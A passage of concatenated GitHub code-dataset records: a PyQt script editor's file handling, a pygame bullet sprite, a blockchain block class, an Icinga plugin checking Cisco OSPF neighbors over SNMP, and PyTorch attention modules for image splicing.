f.close()\r\n Result = 0\r\n except Exception as e:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\":[\"Exception\", str(e)]})\r\n 
finally:\r\n return lstScriptLines, Result\r\n\r\n def SaveScriptToFile(self, lstScriptLines):\r\n opt = QFileDialog.Options()\r\n opt |= QFileDialog.DontUseNativeDialog\r\n try:\r\n filePath, _ = QFileDialog.getSaveFileName(self, \\\r\n \"Save Script To File\", \\\r\n dctAPP_CFIG[\"SCRIPT_PATH\"], \\\r\n \"motion script file (*.ms)\", \\\r\n options=opt)\r\n\r\n fileName = QFileInfo(filePath).fileName().split(\".\")\r\n log.debug(\"Save to filePath:%s, fileName:%s\\r\\n\", filePath, fileName)\r\n if filePath != \"\" and fileName != \"\":\r\n if len(fileName) < 2:\r\n filePath += \".ms\"\r\n f = open(filePath, \"w\")\r\n for line in lstScriptLines:\r\n f.write(line+\"\\n\")\r\n f.close()\r\n except Exception as e:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\":[\"Exception\", str(e)]})\r\n finally:\r\n pass\r\n\r\n def FilterOutNonPrintableChar(self, lines):\r\n for ln in range(len(lines)):\r\n filteredLine = \"\"\r\n for c in lines[ln]:\r\n if c.isprintable():\r\n filteredLine += c\r\n lines[ln] = filteredLine\r\n return lines\r\n\r\n def CheckPointExist(self, PointName):\r\n return self.MotionCtrl.Conn.pExist(PointName)\r\n\r\n#End of Class frmScriptEditor","repo_name":"MyRobot-lab/AxRobotUtility","sub_path":"frmScriptEditor.py","file_name":"frmScriptEditor.py","file_ext":"py","file_size_in_byte":23753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21710778500","text":"from typing import Any\nimport pygame\n\nfrom pygame.sprite import Sprite\n\n\nclass Bullet(Sprite):\n '''Class for managing bullets'''\n\n\n def __init__(self, ai_settings, screen, ship):\n '''Create a bullet object at the ship's current position'''\n super().__init__()\n self.screen = screen\n\n self.rect = pygame.Rect(\n 0, 0, ai_settings.bullet_wigth, ai_settings.bullet_height)\n self.rect.centerx = ship.rect.centerx\n self.rect.top = ship.rect.top\n\n # the position is stored as a float\n self.y = float(self.rect.y)\n\n self.color = ai_settings.bullet_color\n self.speed_factor = ai_settings.bullet_speed_factor\n\n\n def update(self):\n self.y -= self.speed_factor\n self.rect.y = self.y\n\n\n def draw_bullet(self):\n pygame.draw.rect(self.screen, self.color, self.rect)\n","repo_name":"Dmitriy-Solomahin/Alien_invasion","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70057515321","text":"import time\nimport hashlib\nfrom typing import List\n\nfrom transaction import Transaction\n\n# block holds transactions, i.e. a list of assignment details
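\n# Editor's sketch (hypothetical usage, grounded in the methods below --\n# calculate_hash() folds str(transaction) for each pending transaction into a\n# sha256 digest over the timestamp and previous hash):\n#   genesis = Block([])\n#   genesis.calculate_hash()\n#   nxt = Block(pending_txs)\n#   nxt.previous_hash = genesis.hash   # link the chain before hashing\n#   nxt.calculate_hash()\n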
class Block:\n def __init__(self, pending_transactions: List[Transaction]) -> None:\n self.timestamp = time.time()\n self.transactions = pending_transactions # transactions that have yet to be added to a block\n self.hash = None\n self.previous_hash = None\n \n def calculate_hash(self) -> str:\n block_string = str(self.timestamp) + str(self.previous_hash)\n\n # linearly combine transaction hashes into one common string\n for transaction in self.transactions:\n block_string += str(transaction)\n\n self.hash = hashlib.sha256(block_string.encode('utf-8')).hexdigest()\n return self.hash\n \n def to_dict(self):\n return {\n \"hash\": self.hash,\n \"timestamp\": self.timestamp,\n \"transactions\": [transaction.to_dict() for transaction in self.transactions]\n }\n","repo_name":"pdscorg/Blockchain-Fellowship","sub_path":"Day 0/part-3-blockchain/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"29328524855","text":"#!/usr/bin/env python3\n\n'''\n Icinga (Nagios) plugin that checks the status of OSPF neighbors on a Cisco IOS router.\n\n The check returns OK if the neighbor state is 2WAY or FULL.\n Without any optional arguments, returns OK if any OSPF neighbors are detected.\n\n Optional arguments can be passed to match a specific neighbor Router ID (RID) or interface IP to look for.\n In that case a CRITICAL will be generated if that specific neighbor is down.\n\n In case multiple IP's or RID's are provided, a WARNING is generated if any of them is not 2WAY or FULL.\n If you set both IP's and RID's, only the IP's will be checked.\n'''\n\n__version__ = 'v0.22'\n__author__ = 'raoul@node00.nl'\n\nimport sys\nimport argparse\nimport subprocess\nimport re\n\n\ndef ok(msg):\n print('OK:', msg)\n sys.exit(0)\n\n\ndef warning(msg):\n print('WARNING:', msg)\n sys.exit(1)\n\n\ndef critical(msg):\n print('CRITICAL:', msg)\n sys.exit(2)\n\n\ndef unknown(msg):\n print('UNKNOWN:', msg)\n sys.exit(3)\n\n\ndef error(msg):\n print('ERROR:', msg)\n sys.exit(3)\n\n\ndef check_ospf(snmp_check_values):\n\n ospf_states = {\n 1 : 'DOWN',\n 2 : 'ATTEMPT',\n 3 : 'INIT',\n 4 : '2WAY',\n 5 : 'EXSTART',\n 6 : 'EXCHANGE',\n 7 : 'LOADING',\n 8 : 'FULL'\n }\n\n # Save all gathered data to dictionary\n ospf_neighbor_data = {}\n\n ### DEBUG OUTPUT\n\n if snmp_check_values['debug']:\n print('\\n // DEBUG snmp_check_values\\n')\n for key,value in sorted(snmp_check_values.items()):\n print(' {key:20} {value}'.format(**locals()))\n print('\\n // DEBUG ospf_states\\n')\n for key, value in sorted(ospf_states.items()):\n print(' {key}: {value}'.format(**locals()))\n\n ### GET DATA\n\n ## Run snmpwalk commands\n\n try:\n\n # snmpwalk: get OSPF neighbor interface IP's (read: next-hops)\n command_output_ospf_ip = subprocess.check_output(\n [\n 'snmpwalk', '-v', '2c', '-c',\n snmp_check_values['community'],\n snmp_check_values['host'],\n snmp_check_values['ospfNbrIpAddr']\n ]\n )\n\n # snmpwalk: get OSPF neighbor router ID's\n command_output_ospf_rid = subprocess.check_output(\n [\n 'snmpwalk', '-v', '2c', '-c',\n snmp_check_values['community'],\n snmp_check_values['host'],\n snmp_check_values['ospfNbrRtrId']\n ]\n )\n\n # snmpwalk: get OSPF neighbor states\n command_output_ospf_state = subprocess.check_output(\n [\n 'snmpwalk', '-v', '2c', '-c',\n snmp_check_values['community'],\n snmp_check_values['host'],\n snmp_check_values['ospfNbrState']\n ]\n )\n\n
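 # Editor's note: the three walks above read the OSPF-MIB neighbor table --\n # ospfNbrIpAddr (...14.10.1.1), ospfNbrRtrId (...14.10.1.3) and\n # ospfNbrState (...14.10.1.6); snmpwalk prints one line per neighbor entry.\n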
except:\n\n msg = 'Something went wrong with subprocess command \\'snmpwalk\\''\n msg += '\\nIs the host ' + snmp_check_values['host'] + ' reachable?'\n msg += '\\nIs it configured to accept SNMP polls from this host?'\n msg += '\\nIs SNMP community string \\'' + snmp_check_values['community'] + '\\' valid?'\n\n error(msg)\n\n ## Parse snmpwalk commands\n\n try:\n\n # Parse command output: OSPF neighbor router interface IP's\n command_output_ospf_ip_list = command_output_ospf_ip.decode().split('\\n')\n # Parse command output: OSPF router ID's\n command_output_ospf_rid_list = command_output_ospf_rid.decode().split('\\n')\n # Parse command output: OSPF router states\n command_output_ospf_state_list = command_output_ospf_state.decode().split('\\n')\n\n ## Validate SNMP output\n\n # If you try to use this plugin on a non-Cisco IOS router, this happens\n for item in command_output_ospf_ip_list:\n if 'No Such Object available on this agent at this OID' in item:\n msg = 'SNMP OID not found: 1.3.6.1.2.1.14.10.1.1 (ospfNbrIpAddr). \\\n \\nAre you sure this is a Cisco IOS router?'\n error(msg)\n\n ## Parse lists to dictionary\n\n ## Parse router IP's\n\n count = 1\n for item in command_output_ospf_ip_list:\n # Start building dictionary\n neighbor_name = 'Neighbor' + str(count).zfill(2)\n count += 1\n chunks = item.split()\n if len(chunks) == 4:\n ip_address = chunks[3]\n # Create a dictionary with key: 'NeighborXX' and value: list of wanted info\n ospf_neighbor_data[neighbor_name] = ['Neighbor IP', ip_address]\n\n ## Parse router ID's\n\n for item in command_output_ospf_rid_list:\n # Find matching key/value pair in dictionary, so we can add the RID's we find to the correct pair\n chunks = item.split()\n if len(chunks) == 4:\n # Search for RID in ospfNbrRtrId\n for key, value in ospf_neighbor_data.items():\n result = re.search(value[1], chunks[0])\n if result:\n ospf_neighbor_data[key].append('RID')\n ospf_neighbor_data[key].append(chunks[3])\n\n ## Parse OSPF neighbor states\n\n for item in command_output_ospf_state_list:\n chunks = item.split()\n if len(chunks) == 4:\n for key, value in ospf_neighbor_data.items():\n result = re.search(value[1], chunks[0])\n if result:\n ospf_neighbor_data[key].append('State')\n ospf_neighbor_data[key].append(chunks[3])\n\n ### DEBUG OUTPUT\n\n if snmp_check_values['debug']:\n\n print('\\n // DEBUG ospf_neighbor_data\\n')\n print(' {:15} {}'.format('Name', 'Data'))\n print(' {:15} {}'.format('-----', '-------------------------'))\n for key, value in sorted(ospf_neighbor_data.items()):\n print(' {key:15} {value}'.format(**locals()))\n print()\n\n\n ### EVALUATE DATA USING USER INPUT\n\n msg_ospf_state_warning = ''\n ospf_neighbors_down = 0\n ospf_neighbors_up = 0\n ospf_neighbors_evaluated = 0\n ospf_neighbors_total = len(ospf_neighbor_data.keys())\n\n # Check if specified IP's/RID's are actually found\n neighbors_found_set = set()\n neighbors_to_check_set = set()\n\n for key, value in ospf_neighbor_data.items():\n\n current_ip = value[1]\n current_rid = value[3]\n ospf_status = int(value[5])\n\n ## IP: Check for specified IP(s)\n\n if snmp_check_values['ip']:\n for item in snmp_check_values['ip']:\n # Build a set of specified values\n neighbors_to_check_set.add(item)\n # item is one of the IP's from user input\n if item == current_ip:\n # Build a set of matched values\n neighbors_found_set.add(item)\n # If not 2WAY or FULL create warning message\n if not ospf_status == 4 and not ospf_status == 8:\n # If encountered before, add separator // to string\n if 
msg_ospf_state_warning:\n msg_ospf_state_warning += ' // '\n\n warning_msg = 'OSPF neighbor IP ' + current_ip + ' and RID ' + current_rid + ' has state ' + \\\n ospf_states[ospf_status]\n\n msg_ospf_state_warning += warning_msg\n ospf_neighbors_down += 1\n ospf_neighbors_evaluated += 1\n\n # .. else, if 2WAY or FULL neighbor detected, just count it\n if ospf_status == 4 or ospf_status == 8:\n ospf_neighbors_up += 1\n ospf_neighbors_evaluated += 1\n\n ## RID: Check for specified RID(s)\n\n elif snmp_check_values['rid']:\n for item in snmp_check_values['rid']:\n neighbors_to_check_set.add(item)\n # item is one of the RID's from user input\n if item == current_rid:\n neighbors_found_set.add(item)\n # If not 2WAY or FULL create warning message\n if not ospf_status == 4 and not ospf_status == 8:\n # If encountered before, add separator // to string\n if msg_ospf_state_warning:\n msg_ospf_state_warning += ' // '\n\n warning_msg = 'OSPF neighbor IP ' + current_ip + ' and RID ' + current_rid + ' has state ' + \\\n ospf_states[ospf_status]\n\n msg_ospf_state_warning += warning_msg\n ospf_neighbors_down += 1\n ospf_neighbors_evaluated += 1\n\n # .. else, if 2WAY or FULL neighbor detected, just count it\n if ospf_status == 4 or ospf_status == 8:\n ospf_neighbors_up += 1\n ospf_neighbors_evaluated += 1\n\n else:\n # If not 2WAY or FULL create warning message\n if not ospf_status == 4 and not ospf_status == 8:\n # If encountered before, add separator // to string\n if msg_ospf_state_warning:\n msg_ospf_state_warning += ' // '\n\n warning_msg = 'OSPF neighbor IP ' + current_ip + ' and RID ' + current_rid + ' has state ' + \\\n ospf_states[ospf_status]\n\n msg_ospf_state_warning += warning_msg\n ospf_neighbors_down += 1\n ospf_neighbors_evaluated += 1\n\n # .. else, if 2WAY or FULL neighbor detected, just count it\n if ospf_status == 4 or ospf_status == 8:\n ospf_neighbors_up += 1\n ospf_neighbors_evaluated += 1\n\n ### EVALUATE RESULTS AND GENERATE OUTPUT\n\n # Spelling is important\n extra_s = ''\n if ospf_neighbors_up > 1:\n extra_s = 's'\n\n # Totals\n msg_totals = ' (' + str(ospf_neighbors_up) + ' neighbor' + extra_s + ' up out of ' + str(ospf_neighbors_evaluated) + \\\n ' checked, ' + str(ospf_neighbors_total) + ' detected)'\n\n # Perf data\n msg_perfdata = ' | ospf_neighbors=' + str(ospf_neighbors_up)\n\n # WARNING: Warnings detected\n if msg_ospf_state_warning:\n warning(msg_ospf_state_warning + msg_totals + msg_perfdata)\n\n # CRITICAL: Not all neighbors found\n if snmp_check_values['min_neighbors'] > ospf_neighbors_up:\n msg = str(ospf_neighbors_up) + ' OSPF neighbor' + extra_s + ' detected (Required: ' + \\\n str(snmp_check_values['min_neighbors']) + ')'\n critical(msg + msg_totals + msg_perfdata)\n\n # CRITICAL: Specified neighbor not found\n neighbors_not_found_set = neighbors_to_check_set.difference(neighbors_found_set)\n\n if not len(neighbors_not_found_set) == 0:\n msg = 'Could not find:'\n for item in neighbors_not_found_set:\n msg += ' ' + item\n critical(msg + msg_totals + msg_perfdata)\n\n # OK\n msg = str(ospf_neighbors_up) + ' OSPF neighbor' + extra_s + ' in state 2WAY or FULL'\n ok(msg + msg_totals + msg_perfdata)\n\n # Catch own sys.exit in case it was called and exit gracefully\n except SystemExit:\n raise\n\n # On all other exceptions quit with an error\n except:\n msg = 'Something went wrong parsing data. 
Probably wrong SNMP OID for this device.'\n error(msg)\n\n\ndef main():\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(\n description='Icinga (Nagios) plugin that checks the status of OSPF neighbors on a Cisco IOS router.\\\n The check returns OK if the neighbor state is 2WAY or FULL.\\\n Without any optional arguments, returns OK if any OSPF neighbors are detected.\\\n Optional arguments can be passed to match a specific neighbor Router ID (RID) or interface IP to look for.\\\n In that case a CRITICAL will be generated if that specific neighbor is down.\\\n In case multiple IP\\'s or RID\\'s are provided, a WARNING is generated if any of them is not 2WAY or FULL.\\\n If you set both IP\\'s and RID\\'s, only the IP\\'s will be checked.',\n epilog='Written in Python 3.'\n )\n parser.add_argument('--version', action='version', version=__version__)\n parser.add_argument('--debug', action='store_true', help='debug output')\n parser.add_argument('SNMP_COMMUNITY', type=str, help='the SNMP community string of the remote device')\n parser.add_argument('HOST', type=str, help='the IP of the remote host you want to check')\n parser.add_argument('-r', '--rid', type=str, help='OSPF neighbor router ID (multiple possible separated by a comma \\\n and in-between quotes)')\n parser.add_argument('-i', '--ip', type=str, help='OSPF neighbor IP (multiple possible separated by a comma \\\n and in-between quotes)')\n parser.add_argument('-n', '--number', type=int, help='Minimum number of OSPF neighbors required (overrides --ip )')\n args = parser.parse_args()\n\n # Default values\n snmp_check_values = {\n 'community' : args.SNMP_COMMUNITY,\n 'host' : args.HOST,\n 'ospfNbrIpAddr' : '1.3.6.1.2.1.14.10.1.1',\n 'ospfNbrRtrId' : '1.3.6.1.2.1.14.10.1.3',\n 'ospfNbrState' : '1.3.6.1.2.1.14.10.1.6',\n 'rid' : None,\n 'ip' : None,\n 'min_neighbors' : None,\n 'debug' : False\n }\n\n # Debug mode enabled?\n if args.debug:\n snmp_check_values['debug'] = True\n\n # RID set?\n if args.rid:\n rid_list = [args.rid]\n # Check if multiple RID's are given\n if ',' in args.rid:\n rid_list = []\n # Separate IP's by comma\n rid_list_raw = args.rid.split(',')\n # Strip whitespace from IP's\n for item in rid_list_raw:\n # Make sure results are strings (not lists) by using index 0\n rid_list.append(item.split()[0])\n\n snmp_check_values['rid'] = rid_list\n\n\n # Neighbor IP set?\n if args.ip:\n ip_address_list = [args.ip]\n # Check if multiple IP's are given\n if ',' in args.ip:\n ip_address_list = []\n # Separate IP's by comma\n ip_address_list_raw = args.ip.split(',')\n # Strip whitespace from IP's\n for item in ip_address_list_raw:\n # Make sure results are strings (not lists) by using index 0\n ip_address_list.append(item.split()[0])\n\n snmp_check_values['ip'] = ip_address_list\n\n\n # Minimum amount of OSPF neighbors set?\n if args.number:\n snmp_check_values['min_neighbors'] = args.number\n else:\n snmp_check_values['min_neighbors'] = 0\n\n\n # Check OSPF status\n check_ospf(snmp_check_values)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n# Copyright (c) 2014, raoul@node00.nl\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n# 2. 
Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.","repo_name":"critikaster/check_ospf.py","sub_path":"check_ospf.py","file_name":"check_ospf.py","file_ext":"py","file_size_in_byte":16856,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"1139872219","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport functools\nimport math\nimport numbers\n\nfrom scripts.utils.model_init import *\nfrom scripts.models.vgg import Vgg16\nfrom scripts.models.blocks import *\n\n\ndef calc_mean_std(feat, eps=1e-5):\n # eps is a small value added to the variance to avoid divide-by-zero.\n size = feat.size()\n assert (len(size) == 4)\n N, C = size[:2]\n feat_var = feat.view(N, C, -1).var(dim=2) + eps\n feat_std = feat_var.sqrt().view(N, C, 1, 1)\n feat_mean = feat.view(N, C, -1).mean(dim=2).view(N, C, 1, 1)\n return feat_mean, feat_std\n\n\ndef adaptive_instance_normalization(content_feat, style_feat):\n assert (content_feat.size()[:2] == style_feat.size()[:2])\n size = content_feat.size()\n style_mean, style_std = calc_mean_std(style_feat)\n content_mean, content_std = calc_mean_std(content_feat)\n\n normalized_feat = (content_feat - content_mean.expand(\n size)) / content_std.expand(size)\n return normalized_feat * style_std.expand(size) + style_mean.expand(size)\n \n\n# From https://discuss.pytorch.org/t/is-there-anyway-to-do-gaussian-filtering-for-an-image-2d-3d-in-pytorch/12351/3\nclass GaussianSmoothing(nn.Module):\n \"\"\"\n Apply gaussian smoothing on a\n 1d, 2d or 3d tensor. Filtering is performed seperately for each channel\n in the input using a depthwise convolution.\n Arguments:\n channels (int, sequence): Number of channels of the input tensors. 
Output will\n have this number of channels as well.\n kernel_size (int, sequence): Size of the gaussian kernel.\n sigma (float, sequence): Standard deviation of the gaussian kernel.\n dim (int, optional): The number of dimensions of the data.\n Default value is 2 (spatial).\n \"\"\"\n def __init__(self, channels, kernel_size, sigma, dim=2):\n super(GaussianSmoothing, self).__init__()\n if isinstance(kernel_size, numbers.Number):\n kernel_size = [kernel_size] * dim\n if isinstance(sigma, numbers.Number):\n sigma = [sigma] * dim\n\n # The gaussian kernel is the product of the\n # gaussian function of each dimension.\n kernel = 1\n meshgrids = torch.meshgrid(\n [\n torch.arange(size, dtype=torch.float32)\n for size in kernel_size\n ]\n )\n for size, std, mgrid in zip(kernel_size, sigma, meshgrids):\n mean = (size - 1) / 2\n kernel *= 1 / (std * math.sqrt(2 * math.pi)) * \\\n torch.exp(-(((mgrid - mean) / std) ** 2) / 2)# gaussian exponent is -(x-mean)^2 / (2*std^2)\n\n # Make sure sum of values in gaussian kernel equals 1.\n kernel = kernel / torch.sum(kernel)\n\n # Reshape to depthwise convolutional weight\n kernel = kernel.view(1, 1, *kernel.size())\n kernel = kernel.repeat(channels, *[1] * (kernel.dim() - 1))\n\n self.register_buffer('weight', kernel)\n self.groups = channels\n\n if dim == 1:\n self.conv = F.conv1d\n elif dim == 2:\n self.conv = F.conv2d\n elif dim == 3:\n self.conv = F.conv3d\n else:\n raise RuntimeError(\n 'Only 1, 2 and 3 dimensions are supported. Received {}.'.format(dim)\n )\n\n def forward(self, input):\n \"\"\"\n Apply gaussian filter to input.\n Arguments:\n input (torch.Tensor): Input to apply gaussian filter on.\n Returns:\n filtered (torch.Tensor): Filtered output.\n \"\"\"\n return self.conv(input, weight=self.weight, groups=self.groups)\n\nclass ChannelPool(nn.Module):\n def __init__(self,types):\n super(ChannelPool, self).__init__()\n if types == 'avg':\n self.poolingx = nn.AdaptiveAvgPool1d(1)\n elif types == 'max':\n self.poolingx = nn.AdaptiveMaxPool1d(1)\n else:\n raise ValueError(\"pooling type must be 'avg' or 'max'\")\n\n def forward(self, input):\n n, c, w, h = input.size()\n input = input.view(n,c,w*h).permute(0,2,1) \n pooled = self.poolingx(input)# b,w*h,c -> b,w*h,1\n _, _, c = pooled.size()\n return pooled.view(n,c,w,h)\n\nclass RegionalSkipConnect(nn.Module):\n \"\"\"docstring for RegionalSkipConnect\"\"\"\n def __init__(self,channel):\n super(RegionalSkipConnect, self).__init__()\n self.rconv1 = nn.Conv2d(channel,channel*2,3,padding=1,bias=False)\n self.rbn1 = nn.BatchNorm2d(channel*2)\n self.rconv2 = nn.Conv2d(channel*2,channel,3,padding=1,bias=False)\n self.rbn2 = nn.BatchNorm2d(channel)\n\n def forward(self,feature):\n return F.elu(self.rbn2(self.rconv2(F.elu(self.rbn1(self.rconv1(feature)))))) \n\nclass NNSkipConnect(nn.Module):\n \"\"\"docstring for NNSkipConnect\"\"\"\n def __init__(self,channel):\n super(NNSkipConnect, self).__init__()\n self.rconv1 = nn.Conv2d(channel,channel*2,3,padding=1,bias=False)\n self.rbn1 = nn.BatchNorm2d(channel*2)\n self.rconv2 = nn.Conv2d(channel*2,channel,3,padding=1,bias=False)\n self.rbn2 = nn.BatchNorm2d(channel)\n\n def forward(self,feature,mask=None):\n return F.elu(self.rbn2(self.rconv2(F.elu(self.rbn1(self.rconv1(feature)))))) \n\n\nclass GlobalAttentionModule(nn.Module):\n \"\"\"docstring for GlobalAttentionModule\"\"\"\n def __init__(self, channel,reducation=16):\n super(GlobalAttentionModule, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(channel*2,channel//reducation),
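 # editor's note: SE-style bottleneck -- concatenated avg/max statistics (2C)\n # are squeezed to C/reducation, expanded back to C, and turned into a\n # per-channel gate by the final sigmoid.\n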
nn.ReLU(inplace=True),\n nn.Linear(channel//reducation,channel),\n nn.Sigmoid())\n \n def forward(self,x):\n b,c,w,h = x.size()\n y1 = self.avg_pool(x).view(b,c)\n y2 = self.max_pool(x).view(b,c)\n y = self.fc(torch.cat([y1,y2],1)).view(b,c,1,1)\n return x*y\n\nclass SpatialAttentionModule(nn.Module):\n \"\"\"docstring for SpatialAttentionModule\"\"\"\n def __init__(self, channel,reducation=16):\n super(SpatialAttentionModule, self).__init__()\n self.avg_pool = ChannelPool('avg')\n self.max_pool = ChannelPool('max')\n self.fc = nn.Sequential(\n nn.Conv2d(2,reducation,7,stride=1,padding=3),\n nn.ReLU(inplace=True),\n nn.Conv2d(reducation,1,7,stride=1,padding=3),\n nn.Sigmoid())\n \n def forward(self,x):\n b,c,w,h = x.size()\n y1 = self.avg_pool(x)\n y2 = self.max_pool(x)\n y = self.fc(torch.cat([y1,y2],1))\n return x*y\n\n\n\n\nclass GlobalAttentionModuleJustSigmoid(nn.Module):\n \"\"\"docstring for GlobalAttentionModuleJustSigmoid\"\"\"\n def __init__(self, channel,reducation=16):\n super(GlobalAttentionModuleJustSigmoid, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(channel*2,channel//reducation),\n nn.ReLU(inplace=True),\n nn.Linear(channel//reducation,channel),\n nn.Sigmoid())\n \n def forward(self,x):\n b,c,w,h = x.size()\n y1 = self.avg_pool(x).view(b,c)\n y2 = self.max_pool(x).view(b,c)\n y = self.fc(torch.cat([y1,y2],1)).view(b,c,1,1)\n return y\n\nclass RegionalAttentionMask(nn.Module):\n \"\"\"docstring for RegionalAttentionMask\"\"\"\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(RegionalAttentionMask, self).__init__()\n self.connection = type_of_connection(channel)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binarize the downsampled mask\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n background = feature * reverse_mask\n spliced = self.connection(feature) * mask\n return background + spliced \n\n\nclass RegionalAttentionConnect(nn.Module):\n \"\"\"docstring for RegionalAttentionConnect\"\"\"\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(RegionalAttentionConnect, self).__init__()\n self.connection = type_of_connection(channel)\n self.background_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModule(channel,16)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binarize the downsampled mask\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n background = self.background_attention(feature) * reverse_mask\n spliced_feature = self.connection(feature)\n spliced = self.spliced_attention(spliced_feature) * mask\n return background + spliced \n\nclass RegionalAttentionConnectv2(nn.Module):\n \"\"\"docstring for RegionalAttentionConnectv2\"\"\"\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(RegionalAttentionConnectv2, self).__init__()\n self.connection = type_of_connection(channel)\n self.background_attention = GlobalAttentionModule(channel,16)\n self.mixed_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModule(channel,16)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binarize the downsampled mask\n # select features from the background as additional features for the masked splicing region.\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)
 background = self.background_attention(feature) * reverse_mask\n selected_feature = self.mixed_attention(feature)\n spliced_feature = self.spliced_attention(feature)\n spliced = ( self.connection(spliced_feature) + selected_feature ) * mask\n return background + spliced \n\nclass RegionalAttentionConnectWithoutMask(nn.Module):\n \"\"\"docstring for RegionalAttentionConnectWithoutMask\"\"\"\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(RegionalAttentionConnectWithoutMask, self).__init__()\n self.connection = type_of_connection(channel)\n self.background_attention = GlobalAttentionModule(channel,16)\n self.mixed_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModule(channel,16)\n self.mask_attention = SpatialAttentionModule(channel,16)\n self.reverse_mask_attention = SpatialAttentionModule(channel,16)\n\n def forward(self,feature,m):\n _,_,w,_ = feature.size()\n # select features from the background as additional features for the masked splicing region.\n \n # here we build the mask from the input feature itself\n\n mask = self.mask_attention(feature)\n reverse_mask = self.reverse_mask_attention(feature)\n\n reverse_mask = -1*(mask-1)\n background = self.background_attention(feature) * reverse_mask\n selected_feature = self.mixed_attention(feature)\n spliced_feature = self.spliced_attention(feature)\n spliced = ( self.connection(spliced_feature) + selected_feature ) * mask\n return background + spliced \n\n\nclass PreRegionalAttentionConnectv2(nn.Module):\n \"\"\"docstring for PreRegionalAttentionConnectv2\"\"\"\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(PreRegionalAttentionConnectv2, self).__init__()\n self.connection = type_of_connection(channel)\n self.background_attention = GlobalAttentionModule(channel,16)\n self.mixed_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModule(channel,16)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binarize the downsampled mask\n # select features from the background as additional features for the masked splicing region.\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n background = self.background_attention(feature * reverse_mask)\n selected_feature = self.mixed_attention(feature * mask)\n spliced_feature = self.spliced_attention(feature * mask)\n spliced = ( self.connection(spliced_feature) + selected_feature )\n return background + spliced \n\n\nclass PreRegionalAttentionConnectADAIN(nn.Module):\n def __init__(self,channel):\n super(PreRegionalAttentionConnectADAIN, self).__init__()\n self.background_attention = GlobalAttentionModule(channel,16)\n self.mixed_attention = GlobalAttentionModule(channel,16)\n self.spliced_attention = GlobalAttentionModule(channel,16)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binarize the downsampled mask\n # select features from the background as additional features for the masked splicing region.\n mask = torch.round(F.avg_pool2d(mask,2,stride=mw//w))\n reverse_mask = -1*(mask-1)\n background = self.background_attention(feature * reverse_mask)\n selected_feature = self.mixed_attention(feature * mask)\n spliced_feature = self.spliced_attention(feature * mask)\n spliced = ( adaptive_instance_normalization(spliced_feature, background) + selected_feature )\n return background + spliced \n\n\nclass RegionalAttentionConnectv3(nn.Module):\n \"\"\"docstring for RegionalAttentionConnectv3\"\"\"
